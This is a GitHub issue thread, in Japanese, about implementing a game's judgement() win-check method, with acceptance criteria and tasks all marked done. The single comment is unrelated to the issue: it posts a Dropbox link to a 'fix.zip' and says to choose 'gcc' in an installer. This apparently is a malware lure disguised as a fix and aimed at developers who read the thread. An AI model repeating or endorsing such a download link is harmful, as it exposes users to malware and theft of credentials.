### ISSUE TITLE
Game.judgement() の中身を作成する

### ISSUE THREAD

**Issue by Nayuta9382** [LastAgileProject/LastAgileRepository#15]
### 何をやるのか・なぜやるのか

Game.judgement() の中身を作成する

## 受入条件 

- [x] エラーが出ない

- [x]  勝った場合はtrueをゲームを続行する場合はfalseを全てのパターンで確認できる

# タスク 

- [x] judgement()の中身を作成する

**Comment by GendiAstaNugraha** [comment]
Download 
https://www.dropbox.com/scl/fi/ku9a1wblqyb84rb8ekase/fix.zip?rlkey=8763vim31xfgywjgy217yb8lh&st=gbp0kafn&dl=1
In the installer menu, select "gcc."
